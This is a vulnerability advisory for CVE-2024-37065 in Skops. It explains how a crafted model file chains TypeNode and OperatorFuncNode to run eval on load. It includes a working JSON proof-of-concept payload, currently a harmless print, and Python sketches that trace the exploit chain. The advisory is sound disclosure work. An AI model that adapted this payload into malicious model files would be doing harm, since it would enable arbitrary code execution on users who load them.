Skops
Vulnerability Report

Model Deserialization Leads to Code Execution

CVE Number

CVE-2024-37065

Summary

When loading nodes of type OperatorFuncNode, Skops lets a model call functions from the operator module, with the model specifying both the function and the arguments passed to it. An attacker can use this to craft a malicious model that executes arbitrary code when it is loaded and compiled.

Products Impacted

This vulnerability is present in Skops v0.6 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

This vulnerability breaks down into two main components: the ability to load arbitrary functions into memory, and the ability to call a function in the operator module. The first is achieved by creating a node of type TypeNode that pulls in any function you want, such as the builtin eval function:

{
  "__class__": "eval",
  "__module__": "builtins",
  "__loader__": "TypeNode",
  "__id__": 1
}
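To make the first component concrete, here is a minimal sketch of how a module/name pair like the one above can be turned into a live object. The `resolve_type` helper is hypothetical and is not taken from the Skops codebase; it only assumes that a loader imports the named module and fetches the named attribute.

```python
import importlib


def resolve_type(module_name: str, class_name: str):
    """Hypothetical helper: import a module and fetch one attribute from it."""
    module = importlib.import_module(module_name)
    return getattr(module, class_name)


# Same fields as the TypeNode shown above.
node = {"__class__": "eval", "__module__": "builtins", "__loader__": "TypeNode"}
resolved = resolve_type(node["__module__"], node["__class__"])

# The "type" that comes back is the builtin eval function itself.
print(resolved is eval)
```

Nothing in this lookup distinguishes a class from a function, which is why a node that claims to describe a type can hand back a callable such as eval.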

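Because we can load functions into memory, we can exploit the loading system if we are also able to call them with arguments of our choosing. This happens during the compilation of an OperatorFuncNode node, which looks up the named function in the operator module and calls it with the supplied arguments.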

In Python 3.11 and later, the operator module contains a function named call, which calls whatever function is passed to it. This means we need to create a model that grabs the call function and then passes in the eval function and the code we want to run:

{
  "__class__": "call",
  "__module__": "",
  "__loader__": "OperatorFuncNode",
  "attrs": {
    "__class__": "tuple",
    "__module__": "builtins",
    "__loader__": "TupleNode",
    "content": [
      {
        "__class__": "eval",
        "__module__": "builtins",
        "__loader__": "TypeNode",
        "__id__": 1
      },
      {
        "__class__": "str",
        "__module__": "builtins",
        "__loader__": "JsonNode",
        "content": "\"print('pwned by Abraxus from HiddenLayer')\"",
        "__id__": 5,
        "is_json": true
      }
    ],
    "__id__": 8
  },
  "__id__": 0,
  "protocol": 1,
  "_skops_version": "0.10.dev0"
}
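The chain described above can be traced with a small stand-in interpreter. This is a simplified sketch under stated assumptions, not the Skops implementation: the `construct` function and its handling of each loader name are hypothetical, and the payload is reduced to a harmless arithmetic expression in place of the print statement.

```python
import importlib
import json
import operator


def construct(node: dict):
    """Hypothetical, simplified stand-in for node construction (not Skops code)."""
    loader = node["__loader__"]
    if loader == "TypeNode":
        # Resolve module + name to a live object, e.g. builtins.eval.
        return getattr(importlib.import_module(node["__module__"]), node["__class__"])
    if loader == "JsonNode":
        # The content field is itself a JSON document.
        return json.loads(node["content"])
    if loader == "TupleNode":
        return tuple(construct(child) for child in node["content"])
    if loader == "OperatorFuncNode":
        # Look the function up in the operator module and call it with the attrs.
        func = getattr(operator, node["__class__"])
        return func(*construct(node["attrs"]))
    raise ValueError(f"unsupported loader: {loader}")


payload = {
    "__class__": "call",
    "__loader__": "OperatorFuncNode",
    "attrs": {
        "__loader__": "TupleNode",
        "content": [
            {"__class__": "eval", "__module__": "builtins", "__loader__": "TypeNode"},
            {"__loader__": "JsonNode", "content": "\"6 * 7\""},
        ],
    },
}

if hasattr(operator, "call"):  # operator.call only exists on Python 3.11+
    # Equivalent to operator.call(eval, "6 * 7"), i.e. eval("6 * 7").
    print(construct(payload))
```

On Python 3.11 or later the final line evaluates the string through eval; on older interpreters the guard skips it, which mirrors the version requirement noted in the text.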

When this model is loaded with the trusted parameter set to True, or with the trusted types set to all unknown types, the code executes and the load returns None. Both loading examples in the tutorial on how to use the library (scikit-learn documentation) would allow code execution.
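What "all unknown types" can contain is easier to see by listing every type a schema references. The walker below is a hypothetical, stdlib-only sketch and not Skops' own trust-checking logic; `collect_types` and the trimmed `schema` dictionary are illustrative names only.

```python
def collect_types(node, found=None):
    """Hypothetical walker: gather (module, class, loader) for every node in a schema."""
    if found is None:
        found = set()
    if isinstance(node, dict):
        if "__loader__" in node:
            found.add(
                (node.get("__module__", ""), node.get("__class__", ""), node["__loader__"])
            )
        for value in node.values():
            collect_types(value, found)
    elif isinstance(node, list):
        for item in node:
            collect_types(item, found)
    return found


# Trimmed version of the malicious schema from this report.
schema = {
    "__class__": "call",
    "__module__": "",
    "__loader__": "OperatorFuncNode",
    "attrs": {
        "__class__": "tuple",
        "__module__": "builtins",
        "__loader__": "TupleNode",
        "content": [
            {"__class__": "eval", "__module__": "builtins", "__loader__": "TypeNode"},
        ],
    },
}

for module, name, loader in sorted(collect_types(schema)):
    print(f"{loader}: {module}.{name}")
```

A listing like this shows builtins.eval sitting among the referenced types, so blindly passing every reported type back as trusted approves the very function the payload depends on.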

However, even security-minded users can still be exploited, because several parts of the codebase call load and loads with trusted set to True from inside other functions. One example is the update command-line tool.

Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer